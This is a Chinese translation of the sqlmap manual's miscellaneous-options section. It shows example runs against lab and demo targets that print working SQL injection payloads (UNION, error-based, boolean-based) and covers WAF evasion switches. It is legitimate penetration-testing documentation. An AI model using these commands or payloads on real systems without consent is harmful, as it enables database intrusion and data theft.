杂项

    选项:

    输入所有想要使用的选项和开关是很乏味的事情,特别是对于那些常用的选项和开关(例如:--batch --random-agent --ignore-proxy --technique=BEU)。有一个更简短的方法来处理这个问题。在 sqlmap 中,它被称为“助记符”。

    使用选项 -z,每个选项和开关可以用较短的助记符形式,并用逗号(,)分隔,其中助记符代表原始名称的第一个任意选择的部分。选项和开关没有严格映射到他们各自精简后的部分。唯一需要满足的条件是没有其他选项和开关使用了与之相同的前缀。

    例如:

    可以用短助记符形式(多种方法之一)写成:

    1. $ python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=\
    2. 1"

    另一个例子:

    1. $ python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testd\
    2. b -T users -u "www.target.com/vuln.php?id=1"

    可以用短助记符形式写成:

    1. $ python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.\
    2. com/vuln.php?id=1"

    警告成功的 SQL 注入检测

    选项:--alert

    为问题设置答案

    选项:--answers

    如果用户想要自动回答问题,即使使用了 --batch 选项,也可以通过在等号后提供一部分的问题和对应的回答来做到这一点。另外,不同问题的答案可以用分隔符 , 分割。

    针对 MySQL 目标的示例:

    发现 SQL 注入时发出“哔”声

    开关:--beep

    如果用户使用了开关 --beep,那么在发现 SQL 注入时,sqlmap 会立即发出“哔”的警告声。当测试的目标 URLs 是大批量列表(选项 -m)时特别有用。

    清除 DBMS(Database Management System,数据库管理系统)中特定的 sqlmap UDF(s) 和表

    开关:--cleanup

    建议在完成底层操作系统或文件系统的接管后,清理后端 DBMS 中的 sqlmap 临时表(如 sqlmapoutput)和用户定义函数。使用 --cleanup 开关将尽可能地清理 DBMS 和文件系统。

    检查依赖关系

    开关:--dependencies

    1. $ python sqlmap.py --dependencies
    2. [...]
    3. [xx:xx:28] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in
    4.  order to directly connect to the DBMS Firebird. Download from http://kinterbasd
    5. b.sourceforge.net/
    6. [xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
    7. er to directly connect to the DBMS Sybase. Download from http://pymssql.sourcefo
    8. rge.net/
    9. [xx:xx:28] [WARNING] sqlmap requires 'python pymysql' third-party library in ord
    10. er to directly connect to the DBMS MySQL. Download from https://github.com/peteh
    11. unt/PyMySQL/
    12. [xx:xx:28] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in o
    13. rder to directly connect to the DBMS Oracle. Download from http://cx-oracle.sour
    14. ceforge.net/
    15. [xx:xx:28] [WARNING] sqlmap requires 'python-psycopg2' third-party library in or
    16. der to directly connect to the DBMS PostgreSQL. Download from http://initd.org/p
    17. sycopg/
    18. [xx:xx:28] [WARNING] sqlmap requires 'python ibm-db' third-party library in orde
    19. r to directly connect to the DBMS IBM DB2. Download from http://code.google.com/
    20. p/ibm-db/
    21. [xx:xx:28] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-pa
    22. rty library in order to directly connect to the DBMS HSQLDB. Download from https
    23. ://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
    24. [xx:xx:28] [WARNING] sqlmap requires 'python-pyodbc' third-party library in orde
    25. r to directly connect to the DBMS Microsoft Access. Download from http://pyodbc.
    26. googlecode.com/
    27. [xx:xx:28] [WARNING] sqlmap requires 'python-pymssql' third-party library in ord
    28. er to directly connect to the DBMS Microsoft SQL Server. Download from http://py
    29. mssql.sourceforge.net/
    30. [xx:xx:28] [WARNING] sqlmap requires 'python-ntlm' third-party library if you pl
    31. an to attack a web application behind NTLM authentication. Download from http://
    32. code.google.com/p/python-ntlm/
    33. [xx:xx:28] [WARNING] sqlmap requires 'websocket-client' third-party library if y
    34. ou plan to attack a web application using WebSocket. Download from https://pypi.
    35. python.org/pypi/websocket-client/

    开关:--disable-coloring

    默认情况下,sqlmap 输出到控制台时使用着色。你可以使用此开关禁用控制台输出着色,以避免不期望的效果(例如:控制台中未解析的 ANSI 代码着色效果,像 \x01\x1b[0;32m\x02[INFO])。

    使用特定页码的 Google dork 结果

    选项:--gpage

    默认情况下,使用选项 -g 时,sqlmap 会使用 Google 搜索得到的前 100 个 URLs 进行进一步的 SQL 注入测试。结合此选项,你可以使用它(--gpage)指定除第一页以外的页面以检索目标 URLs。

    使用 HTTP 参数污染

    开关:--hpp

    HTTP 参数污染(HPP)是一种绕过 WAF/IPS 防护机制( 有相关介绍)的方法,对 ASP/IIS 和 ASP.NET/IIS 平台尤其有效。如果你怀疑目标使用了这种防护机制,可以尝试使用此开关以绕过它。

    针对 WAF/IPS 防护进行彻底的测试

    开关:--identify-waf

    sqlmap 可以尝试识别后端 WAF/IPS 防护(如果有),以便用户可以执行恰当的步骤(例如:通过选项 --tamper 使用篡改脚本)。目前,大约支持 30 种不同的产品(例如:Airlock,Barracuda WAF 等),可以在 waf 目录下找到它们对应的 WAF 脚本。

    针对受 ModSecurity WAF 防护的 MySQL 目标示例:

    1. $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --i\
    2. dentify-waf -v 3
    3. [...]
    4. [xx:xx:23] [INFO] testing connection to the target URL
    5. [xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
    6. [xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS protection
    7. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'USP Secure Entry Server (Un
    8. ited Security Providers)'
    9. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'BinarySEC Web Application F
    10. irewall (BinarySEC)'
    11. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'NetContinuum Web Applicatio
    12. n Firewall (NetContinuum/Barracuda Networks)'
    13. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
    14. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Cisco ACE XML Gateway (Cisc
    15. o Systems)'
    16. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'TrafficShield (F5 Networks)
    17. '
    18. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Teros/Citrix Application Fi
    19. rewall Enterprise (Teros/Citrix Systems)'
    20. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'KONA Security Solutions (Ak
    21. amai Technologies)'
    22. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Incapsula Web Application F
    23. irewall (Incapsula/Imperva)'
    24. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
    25. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Barracuda Web Application F
    26. irewall (Barracuda Networks)'
    27. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'webApp.secure (webScurity)'
    28. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Proventia Web Application S
    29. ecurity (IBM)'
    30. [xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
    31. [xx:xx:23] [DEBUG] page not found (404)
    32. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'KS-WAF (Knownsec)'
    33. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'NetScaler (Citrix Systems)'
    34. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'Jiasule Web Application Fir
    35. ewall (Jiasule)'
    36. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'WebKnight Application Firew
    37. all (AQTRONIX)'
    38. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'AppWall (Radware)'
    39. [xx:xx:23] [DEBUG] checking for WAF/IPS product 'ModSecurity: Open Source We
    40. b Application Firewall (Trustwave)'
    41. [xx:xx:23] [CRITICAL] WAF/IPS identified 'ModSecurity: Open Source Web Appli
    42. cation Firewall (Trustwave)'. Please consider usage of tamper scripts (option '-
    43. -tamper')

    跳过启发式检测 WAF/IPS 防护

    开关:--skip-waf

    默认情况下,sqlmap 自动在一个启动请求中发送一个虚假的参数值,其中包含一个有意“可疑”的 SQL 注入 payload(例如:...&foobar=AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1)。如果目标响应与原始请求响应不同,那么它很可能存在防护机制。如果有任何问题,用户可以使用开关 --skip-waf 来禁用此机制。

    伪装智能手机

    开关:--mobile

    有时 Web 服务器向手机提供的是不同于电脑的接口。在这种情况下,你可以强制使用预定义好的智能手机 HTTP User-Agent 头部值。使用此开关,sqlmap 将询问你选择一种流行的智能手机,它将在当前运行中进行伪装。

    运行示例:

    1. $ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
    2. [...]
    3. which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
    4. [1] Apple iPhone 4s (default)
    5. [2] BlackBerry 9900
    6. [3] Google Nexus 7
    7. [4] HP iPAQ 6365
    8. [5] HTC Sensation
    9. [6] Nokia N97
    10. [7] Samsung Galaxy S
    11. > 1
    12. [...]

    开关:--offline

    使用开关 --offline,sqlmap 在数据枚举中将仅使用上一个会话的数据。这基本上意味着在这样的运行过程中是零连接尝试的。

    安全地删除 data 目录中所有内容

    While purging, all files from (sub)directories in data folder will be overwritten with random data, truncated, renamed to random names, (sub)directories will be renamed to random names too, and finally the whole directory tree will be deleted.

    如果用户决定安全删除 sqlmap data 目录(例如 $HOME/.sqlmap)中的所有内容,包括之前 sqlmap 运行过的所有目标详细信息,可以使用开关 --purge。在清除时,data 目录中的(子)目录中的所有文件将被随机数据覆盖、截断和被重命名为随意名,(子)目录也将被重命名为随意名,最后整个目录树将被删除。

    运行示例:

    只有在使用启发式检测时才进行彻底的测试

    开关:--smart

    某些情况下,用户拥有大量潜在目标 URL(例如:使用选项 -m)列表,同时他想要尽快找到易受攻击的目标。如果使用了开关 --smart,则只有能引发 DBMS 错误的参数会在进一步的扫描中被使用。否则会被跳过。

    针对 MySQL 目标的示例:

    1. $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&use\
    2. r=foo&id=1" --batch --smart
    3. [...]
    4. [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
    5. [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
    6. [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
    7. [xx:xx:14] [INFO] skipping GET parameter 'ca'
    8. [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
    9. [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
    10. [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' migh
    11. t not be injectable
    12. [xx:xx:14] [INFO] skipping GET parameter 'user'
    13. [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
    14. [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
    15. [xx:xx:14] [INFO] GET parameter 'id' is dynamic
    16. [xx:xx:14] [WARNING] reflective value(s) found and filtering out
    17. [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    18. [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
    19. heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
    20. do you want to include all tests for 'MySQL' extending provided level (1) and ri
    21. sk (1)? [Y/n] Y
    22. [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    23. [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
    24. NG clause' injectable [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    25. '
    26. [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or
    27.  HAVING clause' injectable [xx:xx:14] [INFO] testing 'MySQL inline queries'
    28. [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    29. [xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
    30. [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    31. [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' in jectable
    32. [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    33. [xx:xx:24] [INFO] automatically extending ranges for UNION query injection techn
    34. ique tests as there is at least one other potential injection technique found
    35. [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending t
    36. he range for current UNION query injection technique test
    37. [xx:xx:24] [INFO] target URL appears to have 3 columns in query
    38. [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu
    39. mns' injectable
    40. [...]

    根据 payloads 和/或标题选择(或跳过)测试

    选项:--test-filter

    如果你想根据 payloads 和/或标题过滤测试,可以使用此选项。例如,要测试所有包含 ROW 关键字的 payloads,可以使用 --test-filter=ROW

    针对 MySQL 目标的示例:

    1. $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --b\
    2. atch --test-filter=ROW
    3. [...]
    4. [xx:xx:39] [INFO] GET parameter 'id' is dynamic
    5. [xx:xx:39] [WARNING] reflective value(s) found and filtering out
    6. [xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
    7. [xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
    8. [xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    9. '
    10. [xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or
    11.  HAVING clause' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
    12. )? [y/N] N
    13. sqlmap identified the following injection points with a total of 3 HTTP(s) reque
    14. sts:
    15. ---
    16. Place: GET
    17. Parameter: id
    18.     Type: error-based
    19.     Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    20.     Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELEC
    21. T (C
    22.     ASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FRO
    23. M (S
    24.     ELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
    25. ---
    26. [...]

    选项:--test-skip=TEST

    如果你想根据 payloads 和/或标题跳过测试,可以使用此选项。例如,想要跳过包含 BENCHMARK 关键字的 payloads,可以使用 --test-skip=BENCHMARK

    交互式 sqlmap shell

    开关:--sqlmap-shell

    使用开关 --sqlmap-shell,用户可以看到交互式的 sqlmap shell,它具有所有以前运行的历史记录,包括使用过的选项和/或开关:

    1. $ python sqlmap.py --sqlmap-shell
    2. sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --technique=\
    3. BEU --batch
    4.          _
    5.  ___ ___| |_____ ___ ___  {1.0-dev-2188502}
    6. |_ -| . | |     | .'| . |
    7. |___|_  |_|_|_|_|__,|  _|
    8.       |_|           |_|   http://sqlmap.org
    10. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
    11.  consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
    12. sible for any misuse or damage caused by this program
    14. [*] starting at xx:xx:11
    17. [xx:xx:12] [INFO] testing if the target URL is stable
    18. [xx:xx:13] [INFO] target URL is stable
    19. [xx:xx:13] [INFO] testing if GET parameter 'artist' is dynamic
    20. [xx:xx:13] [INFO] confirming that GET parameter 'artist' is dynamic
    21. [xx:xx:13] [INFO] GET parameter 'artist' is dynamic
    22. [xx:xx:13] [INFO] heuristic (basic) test shows that GET parameter 'artist' might
    23.  be injectable (possible DBMS: 'MySQL')
    24. [xx:xx:13] [INFO] testing for SQL injection on GET parameter 'artist'
    25. ecific for other DBMSes? [Y/n] Y
    26. for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
    27. [xx:xx:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    28. [xx:xx:13] [INFO] GET parameter 'artist' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
    29. [xx:xx:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER B
    30. Y or GROUP BY clause'
    31. [xx:xx:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY
    32.  or GROUP BY clause'
    33. [xx:xx:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
    34. Y or GROUP BY clause (EXTRACTVALUE)'
    35. [xx:xx:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
    36.  or GROUP BY clause (EXTRACTVALUE)'
    37. [xx:xx:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
    38. Y or GROUP BY clause (UPDATEXML)'
    39. [xx:xx:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY
    40.  or GROUP BY clause (UPDATEXML)'
    41. [xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
    42. Y or GROUP BY clause (EXP)'
    43. [xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (E
    44. XP)'
    45. [xx:xx:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
    46. Y or GROUP BY clause (BIGINT UNSIGNED)'
    47. [xx:xx:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE, HAVING clause (B
    48. IGINT UNSIGNED)'
    49. [xx:xx:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
    50. Y or GROUP BY clause'
    51. [xx:xx:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE, HAVING clause'
    52. [xx:xx:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause'
    53. [xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
    54. VALUE)'
    55. [xx:xx:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
    56. [xx:xx:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
    57. VALUE)'
    58. [xx:xx:15] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
    59. ML)'
    60. [xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
    61. [xx:xx:15] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
    62. [xx:xx:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    63. [xx:xx:15] [INFO] automatically extending ranges for UNION query injection techn
    64. ique tests as there is at least one other (potential) technique found
    65. [xx:xx:15] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    66. [xx:xx:15] [INFO] target URL appears to have 3 columns in query
    67. [xx:xx:16] [INFO] GET parameter 'artist' is 'Generic UNION query (NULL) - 1 to 2
    68. 0 columns' injectable
    69. GET parameter 'artist' is vulnerable. Do you want to keep testing the others (if
    70.  any)? [y/N] N
    71. sqlmap identified the following injection point(s) with a total of 39 HTTP(s) re
    72. quests:
    73. ---
    74. Parameter: artist (GET)
    75.     Type: boolean-based blind
    76.     Title: AND boolean-based blind - WHERE or HAVING clause
    77.     Payload: artist=1 AND 5707=5707
    79.     Type: UNION query
    80.     Title: Generic UNION query (NULL) - 3 columns
    81.     Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
    82. 26d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
    83. NULL,NULL-- -
    84. ---
    85. [xx:xx:16] [INFO] testing MySQL
    86. [xx:xx:16] [INFO] confirming MySQL
    87. [xx:xx:16] [INFO] the back-end DBMS is MySQL
    88. web application technology: Nginx, PHP 5.3.10
    89. back-end DBMS: MySQL >= 5.0.0
    90. [xx:xx:16] [INFO] fetched data logged to text files under '/home/stamparm/.sqlma
    91. p/output/testphp.vulnweb.com'
    92. sqlmap-shell> -u "http://testphp.vulnweb.com/artists.php?artist=1" --banner
    93.          _
    94.  ___ ___| |_____ ___ ___  {1.0-dev-2188502}
    95. |_ -| . | |     | .'| . |
    96. |___|_  |_|_|_|_|__,|  _|
    97.       |_|           |_|   http://sqlmap.org
    99. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
    100.  consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not respon
    101. sible for any misuse or damage caused by this program
    103. [*] starting at xx:xx:25
    105. [xx:xx:26] [INFO] resuming back-end DBMS 'mysql'
    106. [xx:xx:26] [INFO] testing connection to the target URL
    107. sqlmap resumed the following injection point(s) from stored session:
    108. ---
    109. Parameter: artist (GET)
    110.     Type: boolean-based blind
    111.     Title: AND boolean-based blind - WHERE or HAVING clause
    112.     Payload: artist=1 AND 5707=5707
    114.     Type: UNION query
    115.     Title: Generic UNION query (NULL) - 3 columns
    116.     Payload: artist=-7983 UNION ALL SELECT CONCAT(0x716b706271,0x6f6c506a7473764
    117. 26d58446f634454616a4c647a6c6a69566e584e454c64666f6861466e697a5069,0x716a786a71),
    118. NULL,NULL-- -
    119. ---
    120. [xx:xx:26] [INFO] the back-end DBMS is MySQL
    121. [xx:xx:26] [INFO] fetching banner
    122. web application technology: Nginx, PHP 5.3.10
    123. back-end DBMS operating system: Linux Ubuntu
    124. back-end DBMS: MySQL 5
    125. banner:    '5.1.73-0ubuntu0.10.04.1'
    126. [xx:xx:26] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/testphp.vulnweb.com'

    适合初学者使用的向导界面

    开关:--wizard

    sqlmap 为初学者提供了一个向导界面,它使用包含尽可能少的问题的简单工作流。如果用户输入目标 URL 并使用了默认设置(例如:按 ),则应该在工作流结束时正确设置 sqlmap 运行环境。

    针对 Microsoft SQL Server 目标的示例: